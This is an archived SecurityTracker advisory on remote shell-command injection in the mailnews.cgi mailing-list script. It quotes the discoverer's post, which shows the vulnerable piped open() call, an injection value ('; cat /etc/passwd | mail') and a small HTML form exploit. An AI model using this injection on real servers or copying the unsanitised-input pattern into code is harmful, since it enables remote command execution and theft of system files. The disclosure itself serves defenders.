Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Web Server/CGI)  >   Mailnews Vendors:   Reuter, Claude
Mailnews Cgi Script May Execute Arbitrary Shell Commands Supplied By Unauthorized Users Via the Network
SecurityTracker Alert ID:  1000949
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Feb 28 2001
Original Entry Date:  Feb 21 2001
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1, 1.3
Description:   The cgi-based MAILNEWS mailing list management software reportedly contains several vulnerabilities that allow an attacker to remotely supply shell commands to be executed by the cgi script.

The most potentially serious vulnerability is that the software fails to appropriately filter certain input parameters. This allows an attacker to provide arbitrary shell commands to the cgi script that will be executed by the cgi script. In addition, the script does not properly protect and enforce passwords such that an unauthorized user without knowledge of the administrative password can add or delete users from an affected maillist.

The original message contains demonstration exploit code.

Impact:   An attacker can remotely provide shell commands to be executed by the cgi script with the privileges of the cgi script.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Authentication error, Input validation error
Underlying OS:  Linux (Any), Apple (Legacy "classic" Mac), UNIX (Any), Windows (Any)
Underlying OS Comments:  Vulnerable target is a Perl script

Message History:   None.

 Source Message Contents

Subject:  CGI - mailnews.cgi vulnerability...

Hello BuGReaders...

##Script: mailnews.cgi


<cat from source>
This script helps you to maintain a mailinglist.

##Tested Version: 1.1, 1.3

Author dont parse some characters and he use very stupid "password
protection". We can add or delete users from maillist without known
admin password. But this is small problem ;] . Lets see what we can do
<cat source>
	open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
where $mailprog [default] is sendmail and $member is users from usersfile.
Now we can do something like this. Add user "; cat /etc/passwd | mail' and use subroutine to execute this code :]

Simple exploit in html:

<INPUT type=hidden NAME="action" value="subscribe">
User to add with ;  [ex:" ; cat /etc/passwd |mail"
without qoutas ofcoz ]<INPUT NAME="address" TYPE="TEXT">
<A HREF="">
Execute command :] </A>
<CENTER> Peace... </CENTER>

Who :	Kanedaaa

***$$$###  " I moze bardzo wielu nie zrozumie tych slow...
		Ale nie ma litosci dla SKURWYSYNOW .... " ###$$* Bohater ... Szef ... Abuser ... Cucumber Team Member... Bzz..


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC